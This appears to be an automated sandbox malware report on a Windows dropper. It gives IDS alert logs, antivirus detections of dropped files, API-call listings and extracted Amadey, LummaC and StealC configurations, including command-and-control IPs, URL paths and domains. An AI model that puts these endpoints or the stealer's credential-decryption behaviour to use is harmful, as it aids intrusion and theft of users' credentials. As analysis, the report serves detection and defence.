                              2024-12-19T14:21:34.176243+010020283713Unknown Traffic192.168.2.449908104.21.66.85443TCP
                              2024-12-19T14:21:37.661202+010020283713Unknown Traffic192.168.2.449919104.21.66.85443TCP
                              2024-12-19T14:21:38.057454+010020283713Unknown Traffic192.168.2.449921104.21.64.80443TCP
                              2024-12-19T14:21:40.737930+010020283713Unknown Traffic192.168.2.449928104.21.66.85443TCP
                              2024-12-19T14:21:43.447455+010020283713Unknown Traffic192.168.2.449937104.21.66.85443TCP
                              2024-12-19T14:21:47.369976+010020283713Unknown Traffic192.168.2.449947104.21.66.85443TCP
                              2024-12-19T14:21:51.316959+010020283713Unknown Traffic192.168.2.449957104.21.66.85443TCP
                              2024-12-19T14:21:54.372788+010020283713Unknown Traffic192.168.2.449968104.21.66.85443TCP
                              2024-12-19T14:26:48.535561+010020283713Unknown Traffic192.168.2.450206172.67.179.109443TCP
                              2024-12-19T14:26:50.797227+010020283713Unknown Traffic192.168.2.450209172.67.179.109443TCP
                              2024-12-19T14:26:53.255037+010020283713Unknown Traffic192.168.2.450210172.67.179.109443TCP
                              2024-12-19T14:26:55.737499+010020283713Unknown Traffic192.168.2.450211172.67.179.109443TCP
                              2024-12-19T14:26:57.823913+010020283713Unknown Traffic192.168.2.450212172.67.179.109443TCP
                              2024-12-19T14:27:00.057891+010020283713Unknown Traffic192.168.2.450215172.67.179.109443TCP
                              2024-12-19T14:27:03.038207+010020283713Unknown Traffic192.168.2.450217172.67.179.109443TCP
                              2024-12-19T14:27:03.128293+010020283713Unknown Traffic192.168.2.450218172.67.179.109443TCP
                              2024-12-19T14:27:05.026251+010020283713Unknown Traffic192.168.2.450219172.67.179.109443TCP
                              2024-12-19T14:27:07.291702+010020283713Unknown Traffic192.168.2.450222172.67.179.109443TCP
                              2024-12-19T14:27:07.517754+010020283713Unknown Traffic192.168.2.450223172.67.179.109443TCP
                              2024-12-19T14:27:09.474149+010020283713Unknown Traffic192.168.2.450224172.67.179.109443TCP
                              2024-12-19T14:27:11.539584+010020283713Unknown Traffic192.168.2.450227172.67.179.109443TCP
                              2024-12-19T14:27:13.760081+010020283713Unknown Traffic192.168.2.450229172.67.179.109443TCP
                              2024-12-19T14:27:16.682561+010020283713Unknown Traffic192.168.2.450235172.67.179.109443TCP
                              2024-12-19T14:27:19.302928+010020283713Unknown Traffic192.168.2.450255172.67.179.109443TCP
                              2024-12-19T14:27:20.299447+010020283713Unknown Traffic192.168.2.450260172.67.179.109443TCP
                              2024-12-19T14:27:21.299800+010020283713Unknown Traffic192.168.2.450264172.67.179.109443TCP
                              2024-12-19T14:27:23.656120+010020283713Unknown Traffic192.168.2.450267172.67.179.109443TCP
                              2024-12-19T14:27:25.848551+010020283713Unknown Traffic192.168.2.450269172.67.179.109443TCP
                              2024-12-19T14:27:27.949056+010020283713Unknown Traffic192.168.2.450271172.67.179.109443TCP
                              2024-12-19T14:27:30.199818+010020283713Unknown Traffic192.168.2.450273172.67.179.109443TCP
                              2024-12-19T14:27:32.327305+010020283713Unknown Traffic192.168.2.450276172.67.179.109443TCP
                              2024-12-19T14:27:34.494021+010020283713Unknown Traffic192.168.2.450277172.67.179.109443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-19T14:20:20.143513+010020546531A Network Trojan was detected192.168.2.449731104.21.64.80443TCP
                              2024-12-19T14:20:31.060716+010020546531A Network Trojan was detected192.168.2.449742104.21.67.146443TCP
                              2024-12-19T14:20:34.028377+010020546531A Network Trojan was detected192.168.2.449745104.21.67.146443TCP
                              2024-12-19T14:20:53.352697+010020546531A Network Trojan was detected192.168.2.449780104.21.67.146443TCP
                              2024-12-19T14:21:14.734365+010020546531A Network Trojan was detected192.168.2.449834104.21.64.80443TCP
                              2024-12-19T14:21:16.873325+010020546531A Network Trojan was detected192.168.2.449841104.21.64.80443TCP
                              2024-12-19T14:21:32.756623+010020546531A Network Trojan was detected192.168.2.449902104.21.66.85443TCP
                              2024-12-19T14:21:34.937501+010020546531A Network Trojan was detected192.168.2.449908104.21.66.85443TCP
                              2024-12-19T14:21:38.835067+010020546531A Network Trojan was detected192.168.2.449921104.21.64.80443TCP
                              2024-12-19T14:26:49.565641+010020546531A Network Trojan was detected192.168.2.450206172.67.179.109443TCP
                              2024-12-19T14:26:51.655598+010020546531A Network Trojan was detected192.168.2.450209172.67.179.109443TCP
                              2024-12-19T14:27:03.800281+010020546531A Network Trojan was detected192.168.2.450217172.67.179.109443TCP
                              2024-12-19T14:27:05.804735+010020546531A Network Trojan was detected192.168.2.450219172.67.179.109443TCP
                              2024-12-19T14:27:08.298079+010020546531A Network Trojan was detected192.168.2.450223172.67.179.109443TCP
                              2024-12-19T14:27:20.075103+010020546531A Network Trojan was detected192.168.2.450255172.67.179.109443TCP
                              2024-12-19T14:27:21.056839+010020546531A Network Trojan was detected192.168.2.450260172.67.179.109443TCP
                              2024-12-19T14:27:22.060559+010020546531A Network Trojan was detected192.168.2.450264172.67.179.109443TCP
                              2024-12-19T14:27:35.288300+010020546531A Network Trojan was detected192.168.2.450277172.67.179.109443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-19T14:20:20.143513+010020498361A Network Trojan was detected192.168.2.449731104.21.64.80443TCP
                              2024-12-19T14:20:31.060716+010020498361A Network Trojan was detected192.168.2.449742104.21.67.146443TCP
                              2024-12-19T14:21:14.734365+010020498361A Network Trojan was detected192.168.2.449834104.21.64.80443TCP
                              2024-12-19T14:21:32.756623+010020498361A Network Trojan was detected192.168.2.449902104.21.66.85443TCP
                              2024-12-19T14:26:49.565641+010020498361A Network Trojan was detected192.168.2.450206172.67.179.109443TCP
                              2024-12-19T14:27:03.800281+010020498361A Network Trojan was detected192.168.2.450217172.67.179.109443TCP
                              2024-12-19T14:27:20.075103+010020498361A Network Trojan was detected192.168.2.450255172.67.179.109443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-19T14:20:34.028377+010020498121A Network Trojan was detected192.168.2.449745104.21.67.146443TCP
                              2024-12-19T14:21:16.873325+010020498121A Network Trojan was detected192.168.2.449841104.21.64.80443TCP
                              2024-12-19T14:21:34.937501+010020498121A Network Trojan was detected192.168.2.449908104.21.66.85443TCP
                              2024-12-19T14:26:51.655598+010020498121A Network Trojan was detected192.168.2.450209172.67.179.109443TCP
                              2024-12-19T14:27:05.804735+010020498121A Network Trojan was detected192.168.2.450219172.67.179.109443TCP
                              2024-12-19T14:27:22.060559+010020498121A Network Trojan was detected192.168.2.450264172.67.179.109443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-19T14:21:31.971712+010020583551Domain Observed Used for C2 Detected192.168.2.449902104.21.66.85443TCP
                              2024-12-19T14:21:34.176243+010020583551Domain Observed Used for C2 Detected192.168.2.449908104.21.66.85443TCP
                              2024-12-19T14:21:37.661202+010020583551Domain Observed Used for C2 Detected192.168.2.449919104.21.66.85443TCP
                              2024-12-19T14:21:40.737930+010020583551Domain Observed Used for C2 Detected192.168.2.449928104.21.66.85443TCP
                              2024-12-19T14:21:43.447455+010020583551Domain Observed Used for C2 Detected192.168.2.449937104.21.66.85443TCP
                              2024-12-19T14:21:47.369976+010020583551Domain Observed Used for C2 Detected192.168.2.449947104.21.66.85443TCP
                              2024-12-19T14:21:51.316959+010020583551Domain Observed Used for C2 Detected192.168.2.449957104.21.66.85443TCP
                              2024-12-19T14:21:54.372788+010020583551Domain Observed Used for C2 Detected192.168.2.449968104.21.66.85443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-19T14:20:18.745239+010020583651Domain Observed Used for C2 Detected192.168.2.449731104.21.64.80443TCP
                              2024-12-19T14:20:20.560952+010020583651Domain Observed Used for C2 Detected192.168.2.449733104.21.64.80443TCP
                              2024-12-19T14:21:13.985297+010020583651Domain Observed Used for C2 Detected192.168.2.449834104.21.64.80443TCP
                              2024-12-19T14:21:16.106715+010020583651Domain Observed Used for C2 Detected192.168.2.449841104.21.64.80443TCP
                              2024-12-19T14:21:19.591163+010020583651Domain Observed Used for C2 Detected192.168.2.449854104.21.64.80443TCP
                              2024-12-19T14:21:22.134347+010020583651Domain Observed Used for C2 Detected192.168.2.449862104.21.64.80443TCP
                              2024-12-19T14:21:25.197121+010020583651Domain Observed Used for C2 Detected192.168.2.449872104.21.64.80443TCP
                              2024-12-19T14:21:30.832098+010020583651Domain Observed Used for C2 Detected192.168.2.449899104.21.64.80443TCP
                              2024-12-19T14:21:34.132800+010020583651Domain Observed Used for C2 Detected192.168.2.449907104.21.64.80443TCP
                              2024-12-19T14:21:38.057454+010020583651Domain Observed Used for C2 Detected192.168.2.449921104.21.64.80443TCP
                              2024-12-19T14:26:48.535561+010020583651Domain Observed Used for C2 Detected192.168.2.450206172.67.179.109443TCP
                              2024-12-19T14:26:50.797227+010020583651Domain Observed Used for C2 Detected192.168.2.450209172.67.179.109443TCP
                              2024-12-19T14:26:53.255037+010020583651Domain Observed Used for C2 Detected192.168.2.450210172.67.179.109443TCP
                              2024-12-19T14:26:55.737499+010020583651Domain Observed Used for C2 Detected192.168.2.450211172.67.179.109443TCP
                              2024-12-19T14:26:57.823913+010020583651Domain Observed Used for C2 Detected192.168.2.450212172.67.179.109443TCP
                              2024-12-19T14:27:00.057891+010020583651Domain Observed Used for C2 Detected192.168.2.450215172.67.179.109443TCP
                              2024-12-19T14:27:03.038207+010020583651Domain Observed Used for C2 Detected192.168.2.450217172.67.179.109443TCP
                              2024-12-19T14:27:03.128293+010020583651Domain Observed Used for C2 Detected192.168.2.450218172.67.179.109443TCP
                              2024-12-19T14:27:05.026251+010020583651Domain Observed Used for C2 Detected192.168.2.450219172.67.179.109443TCP
                              2024-12-19T14:27:07.291702+010020583651Domain Observed Used for C2 Detected192.168.2.450222172.67.179.109443TCP
                              2024-12-19T14:27:07.517754+010020583651Domain Observed Used for C2 Detected192.168.2.450223172.67.179.109443TCP
                              2024-12-19T14:27:09.474149+010020583651Domain Observed Used for C2 Detected192.168.2.450224172.67.179.109443TCP
                              2024-12-19T14:27:11.539584+010020583651Domain Observed Used for C2 Detected192.168.2.450227172.67.179.109443TCP
                              2024-12-19T14:27:13.760081+010020583651Domain Observed Used for C2 Detected192.168.2.450229172.67.179.109443TCP
                              2024-12-19T14:27:16.682561+010020583651Domain Observed Used for C2 Detected192.168.2.450235172.67.179.109443TCP
                              2024-12-19T14:27:19.302928+010020583651Domain Observed Used for C2 Detected192.168.2.450255172.67.179.109443TCP
                              2024-12-19T14:27:20.299447+010020583651Domain Observed Used for C2 Detected192.168.2.450260172.67.179.109443TCP
                              2024-12-19T14:27:21.299800+010020583651Domain Observed Used for C2 Detected192.168.2.450264172.67.179.109443TCP
                              2024-12-19T14:27:23.656120+010020583651Domain Observed Used for C2 Detected192.168.2.450267172.67.179.109443TCP
                              2024-12-19T14:27:25.848551+010020583651Domain Observed Used for C2 Detected192.168.2.450269172.67.179.109443TCP
                              2024-12-19T14:27:27.949056+010020583651Domain Observed Used for C2 Detected192.168.2.450271172.67.179.109443TCP
                              2024-12-19T14:27:30.199818+010020583651Domain Observed Used for C2 Detected192.168.2.450273172.67.179.109443TCP
                              2024-12-19T14:27:32.327305+010020583651Domain Observed Used for C2 Detected192.168.2.450276172.67.179.109443TCP
                              2024-12-19T14:27:34.494021+010020583651Domain Observed Used for C2 Detected192.168.2.450277172.67.179.109443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-19T14:27:09.766186+010020197142Potentially Bad Traffic192.168.2.450225185.215.113.1680TCP
                              2024-12-19T14:27:22.524270+010020197142Potentially Bad Traffic192.168.2.450265185.215.113.1680TCP
                              2024-12-19T14:27:36.751495+010020197142Potentially Bad Traffic192.168.2.450280185.215.113.1680TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-19T14:20:42.891385+010020446961A Network Trojan was detected192.168.2.449768185.215.113.4380TCP
                              2024-12-19T14:20:50.480128+010020446961A Network Trojan was detected192.168.2.449776185.215.113.4380TCP
                              2024-12-19T14:20:59.175395+010020446961A Network Trojan was detected192.168.2.449791185.215.113.4380TCP
                              2024-12-19T14:21:04.556340+010020446961A Network Trojan was detected192.168.2.449809185.215.113.4380TCP
                              2024-12-19T14:21:11.498094+010020446961A Network Trojan was detected192.168.2.449828185.215.113.4380TCP
                              2024-12-19T14:21:54.577672+010020446961A Network Trojan was detected192.168.2.449965185.215.113.4380TCP
                              2024-12-19T14:22:48.754495+010020446961A Network Trojan was detected192.168.2.450106185.215.113.4380TCP
                              2024-12-19T14:26:49.339799+010020446961A Network Trojan was detected192.168.2.450207185.215.113.4380TCP
                              2024-12-19T14:26:59.652395+010020446961A Network Trojan was detected192.168.2.450214185.215.113.4380TCP
                              2024-12-19T14:27:12.432998+010020446961A Network Trojan was detected192.168.2.450228185.215.113.4380TCP
                              2024-12-19T14:27:25.667175+010020446961A Network Trojan was detected192.168.2.450268185.215.113.4380TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-19T14:21:16.737858+010020543501A Network Trojan was detected192.168.2.449842176.53.146.21280TCP
                              2024-12-19T14:21:18.416187+010020543501A Network Trojan was detected192.168.2.449851176.53.146.21280TCP
                              2024-12-19T14:21:33.795974+010020543501A Network Trojan was detected192.168.2.449906176.53.146.21280TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-19T14:21:30.420718+010020583541Domain Observed Used for C2 Detected192.168.2.4566871.1.1.153UDP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-19T14:20:16.826551+010020583641Domain Observed Used for C2 Detected192.168.2.4642441.1.1.153UDP
                              2024-12-19T14:26:47.085719+010020583641Domain Observed Used for C2 Detected192.168.2.4525081.1.1.153UDP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-19T14:20:16.597605+010020583781Domain Observed Used for C2 Detected192.168.2.4494421.1.1.153UDP
                              2024-12-19T14:21:12.622049+010020583781Domain Observed Used for C2 Detected192.168.2.4509021.1.1.153UDP
                              2024-12-19T14:26:46.769469+010020583781Domain Observed Used for C2 Detected192.168.2.4628091.1.1.153UDP
                              2024-12-19T14:27:01.550534+010020583781Domain Observed Used for C2 Detected192.168.2.4651391.1.1.153UDP
                              2024-12-19T14:27:17.910886+010020583781Domain Observed Used for C2 Detected192.168.2.4633681.1.1.153UDP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-19T14:20:26.535757+010020442451Malware Command and Control Activity Detected185.215.113.20680192.168.2.449737TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-19T14:20:26.410156+010020442441Malware Command and Control Activity Detected192.168.2.449737185.215.113.20680TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-19T14:20:26.854501+010020442461Malware Command and Control Activity Detected192.168.2.449737185.215.113.20680TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-19T14:20:28.517116+010020442481Malware Command and Control Activity Detected192.168.2.449737185.215.113.20680TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-19T14:20:27.048275+010020442471Malware Command and Control Activity Detected185.215.113.20680192.168.2.449737TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-19T14:20:38.436336+010020480941Malware Command and Control Activity Detected192.168.2.449755104.21.67.146443TCP
                              2024-12-19T14:21:22.935440+010020480941Malware Command and Control Activity Detected192.168.2.449862104.21.64.80443TCP
                              2024-12-19T14:21:38.891217+010020480941Malware Command and Control Activity Detected192.168.2.449919104.21.66.85443TCP
                              2024-12-19T14:26:56.536487+010020480941Malware Command and Control Activity Detected192.168.2.450211172.67.179.109443TCP
                              2024-12-19T14:27:30.975216+010020480941Malware Command and Control Activity Detected192.168.2.450273172.67.179.109443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-19T14:20:25.929461+010020442431Malware Command and Control Activity Detected192.168.2.449737185.215.113.20680TCP
                              2024-12-19T14:26:58.790444+010020442431Malware Command and Control Activity Detected192.168.2.450213185.215.113.20680TCP
                              2024-12-19T14:27:11.722132+010020442431Malware Command and Control Activity Detected192.168.2.450226185.215.113.20680TCP
                              2024-12-19T14:27:20.267430+010020442431Malware Command and Control Activity Detected192.168.2.450259185.215.113.20680TCP
                              2024-12-19T14:27:28.405816+010020442431Malware Command and Control Activity Detected192.168.2.450270185.215.113.20680TCP
                              2024-12-19T14:27:32.881923+010020442431Malware Command and Control Activity Detected192.168.2.450275185.215.113.20680TCP
                              2024-12-19T14:27:47.904113+010020442431Malware Command and Control Activity Detected192.168.2.450285185.215.113.20680TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-19T14:20:30.452494+010028561211A Network Trojan was detected192.168.2.449741185.215.113.4380TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-19T14:20:18.555000+010028561471A Network Trojan was detected192.168.2.449730185.215.113.4380TCP
                              2024-12-19T14:26:25.514691+010028561471A Network Trojan was detected192.168.2.450199185.215.113.4380TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-19T14:20:28.977663+010028561221A Network Trojan was detected185.215.113.4380192.168.2.449732TCP
                              2024-12-19T14:21:48.931341+010028561221A Network Trojan was detected185.215.113.4380192.168.2.449932TCP
                              2024-12-19T14:22:47.414841+010028561221A Network Trojan was detected185.215.113.4380192.168.2.450072TCP
                              2024-12-19T14:26:47.993212+010028561221A Network Trojan was detected185.215.113.4380192.168.2.450204TCP
                              2024-12-19T14:27:11.775491+010028561221A Network Trojan was detected185.215.113.4380192.168.2.450220TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-19T14:20:23.364724+010028033053Unknown Traffic192.168.2.44973531.41.244.1180TCP
                              2024-12-19T14:20:32.279873+010028033053Unknown Traffic192.168.2.44974331.41.244.1180TCP
                              2024-12-19T14:20:44.430248+010028033053Unknown Traffic192.168.2.44977231.41.244.1180TCP
                              2024-12-19T14:20:52.033880+010028033053Unknown Traffic192.168.2.44977931.41.244.1180TCP
                              2024-12-19T14:21:00.625724+010028033053Unknown Traffic192.168.2.44979731.41.244.1180TCP
                              2024-12-19T14:21:06.005584+010028033053Unknown Traffic192.168.2.44981331.41.244.1180TCP
                              2024-12-19T14:21:43.073441+010028033053Unknown Traffic192.168.2.44993531.41.244.1180TCP
                              2024-12-19T14:22:37.395857+010028033053Unknown Traffic192.168.2.45007631.41.244.1180TCP
                              2024-12-19T14:26:42.452422+010028033053Unknown Traffic192.168.2.450205185.215.113.1680TCP
                              2024-12-19T14:26:50.797289+010028033053Unknown Traffic192.168.2.450208185.215.113.1680TCP
                              2024-12-19T14:27:07.331948+010028033053Unknown Traffic192.168.2.450221185.215.113.1680TCP
                              2024-12-19T14:27:18.985919+010028033053Unknown Traffic192.168.2.450254185.215.113.1680TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-19T14:20:29.354435+010028033043Unknown Traffic192.168.2.449737185.215.113.20680TCP
                              2024-12-19T14:20:46.636348+010028033043Unknown Traffic192.168.2.449765185.215.113.20680TCP
                              2024-12-19T14:20:48.912518+010028033043Unknown Traffic192.168.2.449765185.215.113.20680TCP
                              2024-12-19T14:20:50.138977+010028033043Unknown Traffic192.168.2.449765185.215.113.20680TCP
                              2024-12-19T14:20:51.266488+010028033043Unknown Traffic192.168.2.449765185.215.113.20680TCP
                              2024-12-19T14:20:54.809774+010028033043Unknown Traffic192.168.2.449765185.215.113.20680TCP
                              2024-12-19T14:20:56.178571+010028033043Unknown Traffic192.168.2.449765185.215.113.20680TCP
                              2024-12-19T14:21:02.236712+010028033043Unknown Traffic192.168.2.449803185.215.113.1680TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-19T14:27:33.269798+010028438641A Network Trojan was detected192.168.2.450276172.67.179.109443TCP

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Antivirus / Scanner detection for submitted sample
                              Source: Tii6ue74NB.exeAvira: detected
                              Antivirus detection for dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\4l693L.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                              Found malware configuration
                              Source: 00000018.00000003.2397272020.0000000005290000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                              Source: 5813f66ed1.exe.5552.12.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["cheapptaxysu.click", "sustainskelet.lat", "discokeyus.lat", "energyaffai.lat", "crosshuaht.lat", "necklacebudi.lat", "grannyejh.lat", "aspecteirs.lat", "rapeflowwj.lat"], "Build id": "api--"}
                              Source: 3m20j.exe.5932.10.memstrminMalware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "stok"}
                              Multi AV Scanner detection for dropped file
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeReversingLabs: Detection: 52%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exeReversingLabs: Detection: 47%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exeReversingLabs: Detection: 52%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[2].exeReversingLabs: Detection: 71%
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeReversingLabs: Detection: 52%
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeReversingLabs: Detection: 47%
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeReversingLabs: Detection: 71%
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeReversingLabs: Detection: 52%
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeReversingLabs: Detection: 52%
                              Source: C:\Users\user\Documents\HIDGCFBFBF.exeReversingLabs: Detection: 52%
                              AI detected suspicious sample
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                              Machine Learning detection for dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\4l693L.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exeJoe Sandbox ML: detected
                              Machine Learning detection for sample
                              Source: Tii6ue74NB.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeCode function: 0_2_00DF2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00DF2F1D
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exeCode function: 1_2_00622F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,1_2_00622F1D
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exeCode function: 2_2_003E2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,2_2_003E2F1D
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF0A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,10_2_6BF0A9A0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF043B0 PK11_PubEncryptPKCS1,PR_SetError,10_2_6BF043B0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF30180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,10_2_6BF30180
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF2A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,10_2_6BF2A730
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEEE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,10_2_6BEEE6E0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEE8670 PK11_ExportEncryptedPrivKeyInfo,10_2_6BEE8670
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF0A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,10_2_6BF0A650
